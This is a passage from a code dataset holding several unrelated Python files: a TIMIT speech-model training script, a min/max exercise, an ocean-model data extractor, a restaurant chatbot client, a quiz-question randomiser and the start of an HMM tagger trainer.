'config.yml'))\n else:\n raise ValueError(\"Set model_save_path or saved_model_path.\")\n\n # Load dataset\n train_data = Dataset(\n data_save_path=args.data_save_path,\n backend=params['backend'],\n input_freq=params['input_freq'],\n use_delta=params['use_delta'],\n use_double_delta=params['use_double_delta'],\n data_type='train', label_type=params['label_type'],\n batch_size=params['batch_size'],\n max_epoch=params['num_epoch'], splice=params['splice'],\n num_stack=params['num_stack'], num_skip=params['num_skip'],\n sort_utt=True, sort_stop_epoch=params['sort_stop_epoch'],\n tool=params['tool'], num_enque=None,\n dynamic_batching=params['dynamic_batching'])\n dev_data = Dataset(\n data_save_path=args.data_save_path,\n backend=params['backend'],\n input_freq=params['input_freq'],\n use_delta=params['use_delta'],\n use_double_delta=params['use_double_delta'],\n data_type='dev', label_type=params['label_type'],\n batch_size=params['batch_size'], splice=params['splice'],\n num_stack=params['num_stack'], 
num_skip=params['num_skip'],\n shuffle=True, tool=params['tool'])\n test_data = Dataset(\n data_save_path=args.data_save_path,\n backend=params['backend'],\n input_freq=params['input_freq'],\n use_delta=params['use_delta'],\n use_double_delta=params['use_double_delta'],\n data_type='test', label_type=params['label_type'],\n batch_size=1, splice=params['splice'],\n num_stack=params['num_stack'], num_skip=params['num_skip'],\n tool=params['tool'])\n\n params['num_classes'] = train_data.num_classes\n\n ##################################################\n # MODEL\n ##################################################\n if args.model_save_path is not None:\n # Model setting\n model = load(model_type=params['model_type'],\n params=params,\n backend=params['backend'])\n\n # Set save path\n save_path = mkdir_join(\n args.model_save_path, params['backend'],\n params['model_type'], params['label_type'], model.name)\n model.set_save_path(save_path)\n\n # Save config file\n save_config(config_path=args.config_path, save_path=model.save_path)\n\n # Setting for logging\n logger = set_logger(model.save_path)\n\n if os.path.isdir(params['char_init']):\n # NOTE: Start training from the pre-trained character model\n model.load_checkpoint(\n save_path=params['char_init'], epoch=-1,\n load_pretrained_model=True)\n\n # Count total parameters\n for name in sorted(list(model.num_params_dict.keys())):\n num_params = model.num_params_dict[name]\n logger.info(\"%s %d\" % (name, num_params))\n logger.info(\"Total %.3f M parameters\" %\n (model.total_parameters / 1000000))\n\n # Define optimizer\n model.set_optimizer(\n optimizer=params['optimizer'],\n learning_rate_init=float(params['learning_rate']),\n weight_decay=float(params['weight_decay']),\n clip_grad_norm=params['clip_grad_norm'],\n lr_schedule=False,\n factor=params['decay_rate'],\n patience_epoch=params['decay_patient_epoch'])\n\n epoch, step = 1, 0\n learning_rate = float(params['learning_rate'])\n metric_dev_best = 1\n\n # NOTE: Retrain the saved model from the last checkpoint\n elif args.saved_model_path is not None:\n # Load model\n model = load(model_type=params['model_type'],\n params=params,\n backend=params['backend'])\n\n # Set save path\n model.save_path = args.saved_model_path\n\n # Setting for logging\n logger = set_logger(model.save_path)\n\n # Define optimizer\n model.set_optimizer(\n optimizer=params['optimizer'],\n learning_rate_init=float(params['learning_rate']), # on-the-fly\n weight_decay=float(params['weight_decay']),\n clip_grad_norm=params['clip_grad_norm'],\n lr_schedule=False,\n factor=params['decay_rate'],\n patience_epoch=params['decay_patient_epoch'])\n\n # Restore the last saved model\n epoch, step, learning_rate, metric_dev_best = model.load_checkpoint(\n save_path=args.saved_model_path, epoch=-1, restart=True)\n\n else:\n raise ValueError(\"Set model_save_path or saved_model_path.\")\n\n train_data.epoch = epoch - 1\n\n # GPU setting\n model.set_cuda(deterministic=False, benchmark=True)\n\n logger.info('PID: %s' % os.getpid())\n logger.info('USERNAME: %s' % os.uname()[1])\n\n # Set process name\n setproctitle('timit_' + params['backend'] + '_' +\n params['model_type'] + '_' + params['label_type'])\n\n ##################################################\n # TRAINING LOOP\n ##################################################\n # Define learning rate controller\n lr_controller = Controller(\n learning_rate_init=params['learning_rate'],\n backend=params['backend'],\n decay_type=params['decay_type'],\n 
decay_start_epoch=params['decay_start_epoch'],\n decay_rate=params['decay_rate'],\n decay_patient_epoch=params['decay_patient_epoch'],\n lower_better=True)\n\n # Setting for tensorboard\n if params['backend'] == 'pytorch':\n tf_writer = SummaryWriter(model.save_path)\n\n # Train model\n csv_steps, csv_loss_train, csv_loss_dev = [], [], []\n start_time_train = time.time()\n start_time_epoch = time.time()\n start_time_step = time.time()\n not_improved_epoch = 0\n loss_train_mean = 0.\n pbar_epoch = tqdm(total=len(train_data))\n best_model = None\n while True:\n # Compute loss in the training set (including parameter update)\n batch_train, is_new_epoch = train_data.next()\n model, loss_train_val = train_step(\n model, batch_train, params['clip_grad_norm'], params['backend'])\n loss_train_mean += loss_train_val\n\n pbar_epoch.update(len(batch_train['xs']))\n\n if (step + 1) % params['print_step'] == 0:\n\n # Compute loss in the dev set\n batch_dev = dev_data.next()[0]\n loss_dev = model(\n batch_dev['xs'], batch_dev['ys'],\n batch_dev['x_lens'], batch_dev['y_lens'], is_eval=True)\n\n loss_train_mean /= params['print_step']\n csv_steps.append(step)\n csv_loss_train.append(loss_train_mean)\n csv_loss_dev.append(loss_dev)\n\n # Logging by tensorboard\n if params['backend'] == 'pytorch':\n tf_writer.add_scalar('train/loss', loss_train_mean, step + 1)\n tf_writer.add_scalar('dev/loss', loss_dev, step + 1)\n for name, param in model.named_parameters():\n name = name.replace('.', '/')\n tf_writer.add_histogram(\n name, param.data.cpu().numpy(), step + 1)\n tf_writer.add_histogram(\n name + '/grad', param.grad.data.cpu().numpy(), step + 1)\n\n duration_step = time.time() - start_time_step\n logger.info(\"...Step:%d(epoch:%.3f) loss:%.3f(%.3f)/lr:%.5f/batch:%d/x_lens:%d (%.3f min)\" %\n (step + 1, train_data.epoch_detail,\n loss_train_mean, loss_dev,\n learning_rate, train_data.current_batch_size,\n max(batch_train['x_lens']) * params['num_stack'],\n duration_step / 60))\n start_time_step = time.time()\n loss_train_mean = 0.\n step += 1\n\n # Save checkpoint and evaluate model per epoch\n if is_new_epoch:\n duration_epoch = time.time() - start_time_epoch\n logger.info('===== EPOCH:%d (%.3f min) =====' %\n (epoch, duration_epoch / 60))\n\n # Save fugure of loss\n plot_loss(csv_loss_train, csv_loss_dev, csv_steps,\n save_path=model.save_path)\n\n if epoch < params['eval_start_epoch']:\n # Save the model\n model.save_checkpoint(model.save_path, epoch, step,\n learning_rate, metric_dev_best)\n else:\n start_time_eval = time.time()\n # dev\n per_dev_epoch, _ = eval_phone(\n model=model,\n dataset=dev_data,\n map_file_path='./conf/phones.60-48-39.map',\n eval_batch_size=1,\n beam_width=1,\n max_decode_len=MAX_DECODE_LEN_PHONE)\n logger.info(' PER (dev): %.3f %%' % (per_dev_epoch * 100))\n\n if per_dev_epoch < metric_dev_best:\n metric_dev_best = per_dev_epoch\n not_improved_epoch = 0\n best_model = copy.deepcopy(model)\n logger.info('||||| Best Score (PER) |||||')\n\n # Save the model\n model.save_checkpoint(model.save_path, epoch, step,\n learning_rate, metric_dev_best)\n\n # test\n per_test, _ = eval_phone(\n model=model,\n dataset=test_data,\n map_file_path='./conf/phones.60-48-39.map',\n eval_batch_size=1,\n beam_width=1,\n max_decode_len=MAX_DECODE_LEN_PHONE)\n logger.info(' PER (test): %.3f %%' % (per_test * 100))\n else:\n not_improved_epoch += 1\n\n duration_eval = time.time() - start_time_eval\n logger.info('Evaluation time: %.3f min' % (duration_eval / 60))\n\n # Early stopping\n if 
not_improved_epoch == params['not_improved_patient_epoch']:\n                break\n\n            # Update learning rate\n            model.optimizer, learning_rate = lr_controller.decay_lr(\n                optimizer=model.optimizer,\n                learning_rate=learning_rate,\n                epoch=epoch,\n                value=per_dev_epoch)\n\n            if epoch == params['convert_to_sgd_epoch']:\n                # Convert to fine-tuning stage\n                model.set_optimizer(\n                    'sgd',\n                    learning_rate_init=learning_rate,\n                    weight_decay=float(params['weight_decay']),\n                    clip_grad_norm=params['clip_grad_norm'],\n                    lr_schedule=False,\n                    factor=params['decay_rate'],\n                    patience_epoch=params['decay_patient_epoch'])\n                logger.info('========== Convert to SGD ==========')\n\n                # Inject Gaussian noise to all parameters\n                if float(params['weight_noise_std']) > 0:\n                    model.weight_noise_injection = True\n\n            pbar_epoch = tqdm(total=len(train_data))\n            print('========== EPOCH:%d (%.3f min) ==========' %\n                  (epoch, duration_epoch / 60))\n\n            if epoch == params['num_epoch']:\n                break\n\n            start_time_step = time.time()\n            start_time_epoch = time.time()\n            epoch += 1\n\n    duration_train = time.time() - start_time_train\n    logger.info('Total time: %.3f hour' % (duration_train / 3600))\n\n    if params['backend'] == 'pytorch':\n        tf_writer.close()\n    pbar_epoch.close()\n\n    # Evaluate the best model by beam search\n    per_test_best, _ = eval_phone(\n        model=best_model,\n        dataset=test_data,\n        beam_width=10,\n        max_decode_len=MAX_DECODE_LEN_PHONE,\n        eval_batch_size=1,\n        map_file_path='./conf/phones.60-48-39.map')\n    logger.info(' PER (test, beam: 10): %.3f %%' %\n                (per_test_best * 100))\n\n    # Training was finished correctly\n    with open(os.path.join(model.save_path, 'COMPLETE'), 'w') as f:\n        f.write('')\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"examples/timit/s5/exp/training/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":14403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"510056460","text":"def main():\n    array = [] \n    n = int(input(\"Enter the number of elements in the array: \")) \n\n    for _ in range(n): \n        element = int(input(\"Enter the element: \"))\n        array.append(element) \n    print(\"Smallest value in the array:\",min(array))\n    print(\"Largest value in the array:\",max(array))\n\n\nmain()","sub_path":"Vetores e Matrizes/pos_elementos_menor_maior.py","file_name":"pos_elementos_menor_maior.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"392599273","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport matplotlib as mpl\nimport datetime as dt\nfrom salishsea_tools import evaltools as et, places, viz_tools, visualisations\nimport xarray as xr\nimport pandas as pd\nimport pickle\nimport os\nimport bloomdrivers\n\n\ndef extract_loc(basedir,start,end,ij,ii,jw,iw,savepath):\n    with xr.open_dataset('/data/vdo/MEOPAR/NEMO-forcing/grid/mesh_mask201702.nc') as mesh:\n        tmask=np.array(mesh.tmask)\n        gdept_1d=np.array(mesh.gdept_1d)\n        e3t_0=np.array(mesh.e3t_0)\n    nam_fmt='nowcast'\n    flen=1 # files contain 1 day of data each\n    ftype= 'ptrc_T' # load bio files\n    tres=24 # 1: hourly resolution; 24: daily resolution \n    flist=et.index_model_files(start,end,basedir,nam_fmt,flen,ftype,tres)\n    flist3 = et.index_model_files(start,end,basedir,nam_fmt,flen,\"grid_T\",tres)\n    fliste3t = et.index_model_files(start,end,basedir,nam_fmt,flen,\"carp_T\",tres)\n\n    ik=0\n    with xr.open_mfdataset(flist['paths']) as bio:\n        bio_time=np.array(bio.time_centered[:])\n        
no3_alld=np.array(bio.nitrate.isel(y=ij,x=ii)) \n        diat_alld=np.array(bio.diatoms.isel(y=ij,x=ii))\n        flag_alld=np.array(bio.flagellates.isel(y=ij,x=ii))\n        cili_alld=np.array(bio.ciliates.isel(y=ij,x=ii))\n        microzoo_alld=np.array(bio.microzooplankton.isel(y=ij,x=ii))\n        mesozoo_alld=np.array(bio.mesozooplankton.isel(y=ij,x=ii))\n        print('bio done')\n    with xr.open_mfdataset(fliste3t['paths']) as carp:\n        intdiat=np.array(np.sum(bio.diatoms.isel(y=ij,x=ii)*carp.e3t.isel(y=ij,x=ii),1)) # depth integrated diatom\n        intphyto=np.array(np.sum((bio.diatoms.isel(y=ij,x=ii)+bio.flagellates.isel(y=ij,x=ii)\\\n                 +bio.ciliates.isel(y=ij,x=ii))*carp.e3t.isel(y=ij,x=ii),1))\n        spar=np.array(carp.PAR.isel(deptht=ik,y=ij,x=ii))\n        intmesoz=np.array(np.sum(bio.mesozooplankton.isel(y=ij,x=ii)*carp.e3t.isel(y=ij,x=ii),1))\n        intmicroz=np.array(np.sum(bio.microzooplankton.isel(y=ij,x=ii)*carp.e3t.isel(y=ij,x=ii),1))\n        print('carp done')\n    with xr.open_mfdataset(flist3['paths']) as grid:\n        grid_time=np.array(grid.time_centered[:])\n        temp=np.array(grid.votemper.isel(deptht=ik,y=ij,x=ii)) #surface temperature\n        salinity=np.array(grid.vosaline.isel(deptht=ik,y=ij,x=ii)) #surface salinity\n\n    opsdir='/results/forcing/atmospheric/GEM2.5/operational'\n\n    flist2=et.index_model_files(start,end,opsdir,nam_fmt='ops',flen=1,ftype='None',tres=24)\n    with xr.open_mfdataset(flist2['paths']) as winds:\n        u_wind=np.array(winds.u_wind.isel(y=jw,x=iw))\n        v_wind=np.array(winds.v_wind.isel(y=jw,x=iw))\n        twind=np.array(winds.time_counter)\n        solar=np.array(winds.solar.isel(y=jw,x=iw))\n\n    allvars=(bio_time,diat_alld,no3_alld,flag_alld,cili_alld,microzoo_alld,mesozoo_alld,\n             intdiat,intphyto,spar,intmesoz,intmicroz,\n             grid_time,temp,salinity,u_wind,v_wind,twind,solar)\n    pickle.dump(allvars,open(savepath,'wb'))\n\n\ndef runS3_1812_2015():\n    # you could edit this to accept dates/locations as input and loop through them to extract all files\n\n    start=dt.datetime(2015,1,1)\n    end=dt.datetime(2015,4,1)\n    year=str(start.year)\n    modver='201812'\n    loc='S3'\n    ij,ii=places.PLACES['S3']['NEMO grid ji']\n    # GEM2.5 grid ji is atm forcing grid for ops files\n    jw,iw=places.PLACES['S3']['GEM2.5 grid ji']\n    \n    #savedir='/ocean/aisabell/MEOPAR/extracted_files'\n    savedir='/ocean/eolson/MEOPAR/'\n    \n    fname=f'testJanToMarch_TimeSeries_{year}_{loc}_{modver}.pkl'\n    savepath=os.path.join(savedir,fname)\n    loc='S3'\n    \n    basedir='/results/SalishSea/nowcast-green.201812/'\n\n    extract_loc(basedir,start,end,ij,ii,jw,iw,savepath)\n\nif __name__ == \"__main__\":\n    runS3_1812_2015()\n","sub_path":"notebooks/forAline/extractloc2.py","file_name":"extractloc2.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"586459364","text":"import os\nimport argparse\nimport time\n\nfrom nlp import load_train_data, nlp_stupid, nlp_base, nlp_key, train_decision_tree, train_neuralnetwork, train_logistic_regression, number_to_word\nfrom dialog_manager import state_transition\n\n# To run this code, please cd to the correct directory and run\n# python chatbot.py\n# or\n# python3 chatbot.py\n\n# You can also switch on some configurations with:\n# -c (answering all utterances in caps lock will be switched on)\n# -f (formal responses will be switched on)\n# -a (showing the dialog acts as well will be switched on)\n# Example of running it:\n# python chatbot.py -c -f -a\n# or\n# python3 chatbot.py -c -f -a\n\n# This is the first message you see when running the code\nWELCOME_MESSAGE = \"\"\"\nWelcome! 
This is a beautiful chatbot named KASA.\n\nHowever... it is as smart as you want it to be. So choose wisely!\n\nIf you have had enough of the chatbot, simply type bye,\nand it will shut up. You will be redirected to the survey at the end.\n\n\"\"\"\n\n# This code makes it possible to add arguments to your run command\nparser = argparse.ArgumentParser(\n    description='MAIR chatbot project.'\n)\n\n# This part makes it possible to choose between capital letters or lower-case letters\nparser.add_argument(\n    '-c', '--caps', \n    action = 'store_true', \n    help='By using -c the bot will only respond in caps' \n)\n\n# This determines whether the response is formal or not\nparser.add_argument(\n    '-f', '--formal',\n    action = 'store_true',\n    help='By using -f the bot will give formal responses'\n)\n\n# This determines whether we see the dialog acts in the conversation or not\nparser.add_argument(\n    '-a', '--acts',\n    action = 'store_true',\n    help='By using -a the bot will also show you the acts'\n)\n\nargs = parser.parse_args()\n\n# This displays the conversation that is extracted in chat_client\ndef display_convo(convo, show_acts, max_sentences=10):\n    # max_sentences is a hyperparameter\n    os.system('clear')\n    \n    print(0*'\\n')\n    print(40*'#' + ' KASA ' + 40*'#')\n    \n    # To keep the conversation within the borders of the terminal\n    if len(convo) < max_sentences:\n        print(3 * (max_sentences - len(convo)) * '\\n')\n    \n    # To keep the conversation within the borders of the terminal\n    if len(convo) > 0: \n        for i in range(0, min(len(convo), max_sentences)):\n            i += max(0, len(convo) - max_sentences)\n            print('> {}'.format(convo[i]['user']))\n            print('--> {}'.format(convo[i]['bot']))\n            if show_acts:\n                print('speech act:({})'.format(convo[i]['act']))\n            print()\n\n# This creates the dialog\ndef chat_client(method, caps, formal, show_acts, name):\n    \n    keep_chatting = True\n    state = 1 # to set the start state\n    preferences = {} # Initiate preferences\n    restaurants = []\n    additional_pref = list()\n    result = ''\n    t0 = time.time()\n\n    if formal:\n        beginconvo = 'Hello, welcome to KASA! \\n You can ask for restaurants by area, price range or food type. How may I help you?'\n    else:\n        beginconvo = 'Hey there!!! Welcome to KASA! \\n You can ask for restaurants by area, price range, or food type. Let\\'s go, enter your request! 
:)'\n \n if caps:\n beginconvo = beginconvo.upper()\n \n convo = []\n\n \n #The first interation so that we know to which bot we are talking and what is asked from the user\n if show_acts:\n convo.append({\n 'user': 'You are talking to the {} bot'.format(name),\n 'bot': beginconvo,\n 'act': ''\n })\n else:\n convo.append({\n 'user': 'You are talking to the {} bot'.format(name),\n 'bot': beginconvo\n })\n \n # During the conversation\n while keep_chatting:\n \n display_convo(convo, show_acts)\n \n user_input = input('> ')\n \n #Extra to always be able to leave the bot\n if user_input.lower() == 'abort' or user_input.lower() == 'exit':\n message = '--> bye bye, hope to see you again soon!'\n state = 9\n if caps:\n print(message.upper())\n else:\n print(message) \n #exit(0)\n \n act = method(user_input)\n # By talking to the dialog manager we get the neccessary information and response back for the conversation\n state, client_output, preferences, restaurants, result = state_transition(user_input, state, act, preferences, restaurants, result, additional_pref, formal, convo, t0) \n \n # Make output caps if its true\n if caps:\n client_output = client_output.upper()\n\n # Creating the right conversation logs for show_acts = true or not\n if show_acts:\n convo.append({\n 'user': user_input,\n 'bot': client_output,\n 'act': act\n })\n else:\n convo.append({\n 'user': user_input,\n 'bot': client_output\n })\n \n return\n\ndef main(caps, formal, show_acts):\n os.system('clear')\n\n # Will happen more often when bot text is shown and caps=True\n if caps:\n print(WELCOME_MESSAGE.upper())\n else:\n print(WELCOME_MESSAGE)\n \n data, training = load_train_data(os.path.join('dialog_acts.dat')) # Create the neccessary datasets\n \n #In this loop we will train the models based on the input.\n while True:\n method = input('Choose a method for your bot. The options are: \\n(s)tupid, (b)ase, (k)ey, (t)ree, (n)eural, (l)ogistic \\n> ')\n\n if method.lower() == 's' or method.lower() == 'stupid': # This is the extremely stupid bot that does nothing correct\n algo = lambda x: nlp_stupid(x)\n break\n if method.lower() == 'b' or method.lower() == 'base': # This is the base which only predicts the majority class\n algo = lambda x: nlp_base(data)\n break\n if method.lower() == 'k' or method.lower() == 'key': # This other base is completely based on keyword detection\n algo = lambda x: nlp_key(x, training)\n break \n if method.lower() == 't' or method.lower() == 'tree': # This is our Decision Tree model\n model, enc, bow, x_test, y_test = train_decision_tree(data)\n algo = lambda x: number_to_word(x, model, enc, bow)\n break\n if method.lower() == 'n' or method.lower() == 'neural': # This is our Neural Network model\n message = '\\nThanks for choosing my brain! Let me get those gears oiled up and ready to grind, give me a few seconds.'\n if caps: # We need to use CAPS for everything that seems like a text from the bot when caps = true\n print(message.upper())\n else:\n print(message)\n model, enc, bow, x_test, y_test = train_neuralnetwork(data)\n algo = lambda x: number_to_word(x, model, enc, bow) # For vector translation to words\n break\n if method.lower() == 'l' or method.lower() == 'logistic': # This is our Logistic regression model\n message = '\\nGive me a few seconds to become a very logical being, capable of helping you out with all your restaurant related questions! You\\'re welcome! 
:)'\n if caps: # We need to use CAPS for everything that seems like a text from the bot when caps = true\n print(message.upper())\n else:\n print(message) \n model, enc, bow, x_test, y_test = train_logistic_regression(data)\n algo = lambda x: number_to_word(x, model, enc, bow) # For vector translation to words\n break\n \n os.system('clear')\n \n # If nothing of the above happens, we stay in the loop, but display a new message to indicate that the input did not suffice\n print(WELCOME_MESSAGE)\n print('WHOOPS... that method is NOT recognized.')\n print()\n \n os.system('clear')\n \n #Here we will make the UI\n chat_client(algo, caps, formal, show_acts, method) # We only need to train our model once and give it to the chat_client\n \nif __name__ == '__main__':\n main(args.caps, args.formal, args.acts) # To give these booleans to the main function\n \n ","sub_path":"chatbot.py","file_name":"chatbot.py","file_ext":"py","file_size_in_byte":8536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"219329349","text":"\nimport sys\n\n#sys.path.append(\n# '/home/jbs/develop.old/articles/201509_python_exercises_generator')\n\n#sys.path.append('/home/jbs/develop/201902_questions_transformer')\nsys.path.append('../qom_questions_transformer')\n\nimport string\nfrom random import sample\nfrom random import choice\nfrom random import randint\nfrom random import shuffle\n\nfrom text_transformer.tt_text_transformer_interface import add_changeable\n#from text_transformer.tt_text_transformer_interface import change_all_occurrences\nfrom text_transformer.tt_text_transformer_interface import change_one_occurrence\n\n# # this import removes an import error. I don't know why (jbs\n# # 2018/12/12). see pt_import_tests.py and try to correct the problem.\n# import py_transformer.ast_processor\n\n# from python_transformer.pt_python_transformer_interface import change_identifier_all_occurrences\n# from python_transformer.pt_python_transformer_interface import change_all_occurrences_in_strings\nfrom python_transformer.pt_python_transformer_interface import change_token_all_occurrences\nfrom python_transformer.pt_python_transformer_interface import change_all_occurrences\n\n#from sympy import latex, sympify\n\n\n\n\n\n# in the question (program)\nadd_changeable('135') # seed\nadd_changeable('a') # the list with numbers\nadd_changeable('b') # the list with strings\nadd_changeable('d') # 2nd list with numbers\nadd_changeable('l') # string to be generated\nadd_changeable('k') # loop variable\nadd_changeable('i')\nadd_changeable('3') # multiplier\nadd_changeable('10') # the list length\nadd_changeable('20') # second for range\nadd_changeable('50') # max int number\n\n\n# answers list name\nadd_changeable(r'\\verb+a+')\nadd_changeable(r'\\verb+b+')\nadd_changeable(r'\\verb+ab+')\nadd_changeable(r'\\verb+d+')\nadd_changeable(r'\\verb+_33+')\n\n#functions to be insered in questions\nadd_changeable(r'\\verb+func1+')\nadd_changeable(r'\\verb+func2+')\nadd_changeable(r'\\verb+func3+')\nadd_changeable(r'\\verb+func4+')\nadd_changeable(r'\\verb+func5+')\n\n\n\n# answers (indexes)\nadd_changeable(r'\\verb+1+')\nadd_changeable(r'\\verb+2+')\nadd_changeable(r'\\verb+3+')\nadd_changeable(r'\\verb+4+')\nadd_changeable(r'\\verb+5+')\n\n# right answers values\nadd_changeable(r'\\verb+11+')\nadd_changeable(r'\\verb+22+')\nadd_changeable(r'\\verb+33+')\nadd_changeable(r'\\verb+44+')\nadd_changeable(r'\\verb+55+')\n\n# wrong answers 
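# The method-selection if-chain in chatbot.py above could also be written as a
# dispatch table; a self-contained sketch of the pattern (the stub trainers here
# stand in for train_decision_tree / train_neuralnetwork / train_logistic_regression):
def train_tree(data): return 'tree model'
def train_neural(data): return 'neural model'
def train_logistic(data): return 'logistic model'

TRAINERS = {'t': train_tree, 'tree': train_tree,
            'n': train_neural, 'neural': train_neural,
            'l': train_logistic, 'logistic': train_logistic}

method = 't'  # e.g. the user's lowercased input
if method in TRAINERS:
    print(TRAINERS[method]([]))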
values\nadd_changeable(r'\\verb+111+')\nadd_changeable(r'\\verb+222+')\nadd_changeable(r'\\verb+333+')\nadd_changeable(r'\\verb+444+')\nadd_changeable(r'\\verb+555+')\n\n\n\n\n\n# variáveis partilhas entre as funções make_transformations e\n# make_transformations_on_results\na = None\nd = None\n_1 = None\n_2 = None\n_3 = None\n_4 = None\n_5 = None\ndecision = None\n_10 = None\n_20 = None\n_33 = None\n_func5 = None\n\n\n\n\n\ndef make_transformations():\n ''\n global a\n global d\n global _1\n global _2\n global _3\n global _4\n global _5\n global _10\n global _20\n global _33\n global decision\n global _func5\n \n # question\n _135 = str(randint(1000000, 2000000))\n [a, b, d, l, k, i] = sample(string.ascii_lowercase, 6)\n _10 = randint(18000, 20000)\n _50 = randint(50, 150)\n _20 = _10 * randint(2, 4)\n _33 = randint(2, 5)\n \n change_all_occurrences('135', _135)\n change_token_all_occurrences('a', a)\n change_token_all_occurrences('b', b)\n change_token_all_occurrences('d', d)\n change_token_all_occurrences('l', l)\n change_token_all_occurrences('k', k)\n change_token_all_occurrences('i', i)\n change_all_occurrences('10', str(_10))\n change_all_occurrences('50', str(_50))\n change_all_occurrences('20', str(_20))\n change_all_occurrences('3', str(_33))\n\n func1 = choice(('[::-1].sort()', '[-1::].sort()', '[:-1:].sort()'))\n func2 = 'sort(reverse=True)'\n func3 = ['sort(key=len)', 'sort()',\n 'sort(key=len, reverse=True)', 'sort(reverse=True)']\n ab = [b, a]\n decision = choice((0, 1, 2, 3))\n # answers\n change_all_occurrences(r'\\verb+_33+',\"\" + r'\\verb+' + str(_33) + '+'+ \"\")\n change_all_occurrences(r'\\verb+a+',\"\" + r'\\verb+' + a + '+'+ \"\")\n change_all_occurrences(r'\\verb+b+',\"\" + r'\\verb+' + b + '+'+ \"\")\n change_all_occurrences(r'\\verb+ab+',\"\" + r'\\verb+' + ab[decision % 2] + '+'+ \"\")\n change_all_occurrences(r'\\verb+d+',\"\" + r'\\verb+' + d + '+'+ \"\")\n change_all_occurrences(r'\\verb+func1+',\"\" + r'\\verb+' + func1 + '+'+ \"\")\n change_all_occurrences(r'\\verb+func2+',\"\" + r'\\verb+' + func2 + '+'+ \"\")\n change_all_occurrences(r'\\verb+func3+',\"\" + r'\\verb+' + func3[decision] + '+'+ \"\")\n # indexes with no repetitions\n _5 = choice((2, 3, 4, 5))\n _func5 = choice(('primeiros', 'ultimos'))\n\n [_3] = sample(range(_50), 1)\n change_all_occurrences(r'\\verb+2+',\"\" + r'\\verb+' + _func5[decision] + '+'+ \"\")\n change_all_occurrences(r'\\verb+3+',\"\" + r'\\verb+' + str(_3) + '+'+ \"\")\n change_all_occurrences(r'\\verb+5+',\"\" + r'\\verb+' + str(_5) + '+'+ \"\")\n change_all_occurrences(r'\\verb+func5+',\"\" + r'\\verb+' + _func5 + '+'+ \"\")\n \n\n\n\ndef make_transformations_on_results(program):\n ''\n # os global aqui não são precisos porque não se faz nesta função\n # atribuição a estas variáveis. 
Só está para para tornar explícito\n # que são variáveis globais partilhadas\n global a\n global d\n global _1\n global _2\n global _3\n global _4\n global _5\n global decision\n global _10\n global _20\n global _33\n global _func5\n\n \n form = ['crescente', 'decrescente']\n base = ['com base no tamanho da string', 'com base no numero']\n answer = form[0] if decision < 3 else form[1]\n answer += ' '\n answer += base[decision%2]\n the_list = program.get_global(d)\n #print(the_list)\n \n answer_2_true = answer\n times = _33\n for i in range(1, int(_20 / _10)):\n times *= _33\n answer_3_true = the_list[_3]\n answer_4_true = times\n answer_5_true = a + '[:' + str(_5) + ':]' if _func5 == 'primeiros' else a + '[-' + str(_5) +'::]'\n\n # true answers\n \n change_all_occurrences(r'\\verb+22+',\"\" + str(answer_2_true)+ \"\")\n change_all_occurrences(r'\\verb+33+',\"\" + str(answer_3_true)+ \"\")\n change_all_occurrences(r'\\verb+44+',\"\" + str(answer_4_true)+ \"\")\n change_all_occurrences(r'\\verb+55+',\"\" + str(answer_5_true)+ \"\")\n\n # wrong answers\n \n increment3 = choice([1, -1])\n increment4 = choice([1, -1])\n increment5 = choice([1, -1])\n\n answer = form[1] if decision < 3 else form[0]\n answer += ' '\n answer += base[decision%2]\n\n \n answer_2_false = answer\n answer_3_false = the_list[_3] + increment3\n answer_4_false = answer_4_true + increment4\n answer_5_false = a + wrong_5_awnser(_func5, _5)\n \n change_all_occurrences(r'\\verb+222+',\"\" + str(answer_2_false)+ \"\")\n change_all_occurrences(r'\\verb+333+',\"\" + str(answer_3_false)+ \"\")\n change_all_occurrences(r'\\verb+444+',\"\" + str(answer_4_false)+ \"\")\n change_all_occurrences(r'\\verb+555+',\"\" + str(answer_5_false)+ \"\")\n\n\ndef wrong_5_awnser(string, num):\n num = str(num)\n if string == 'primeiros':\n return choice(('['+ num + ']', '[' + num +'::]', '[::' + num +']'))\n return choice(('[-'+ num + ']', '[:-' + num +':]', '[::-' + num +']'))\n\n","sub_path":"03_Implementacao/DataBase/true_or_false_question_working_with_lists/altered_make_transformations_for_code.py","file_name":"altered_make_transformations_for_code.py","file_ext":"py","file_size_in_byte":7990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"60713148","text":"\"\"\"\nChanged OOV handling\n\"\"\"\n\nimport sys\nimport re\n\nfrom collections import defaultdict\n\n# Files\nTAG_FILE = sys.argv[1]\nTOKEN_FILE = sys.argv[2]\nOUTPUT_FILE = sys.argv[3]\n\n# Vocabulary\nvocab = {}\nOOV_WORD = \"OOV\"\nINIT_STATE = \"init\"\nFINAL_STATE = \"final\"\n\n# Transition and emission probabilities\nemissions = {}\ntransitions = {}\ntransitions_total = defaultdict(lambda: 0)\nemissions_total = defaultdict(lambda: 0)\n\nwith open(TAG_FILE) as tag_file, open(TOKEN_FILE) as token_file:\n for tag_string, token_string in zip(tag_file, token_file):\n tags = re.split(\"\\s+\", tag_string.rstrip())\n tokens = re.split(\"\\s+\", token_string.rstrip())\n pairs = zip(tags, tokens)\n\n prevtag = INIT_STATE\n\n for (tag, token) in pairs:\n\n # this block is a little trick to help with out-of-vocabulary (OOV)\n # words. the first time we see *any* word token, we pretend it\n # is an OOV. 
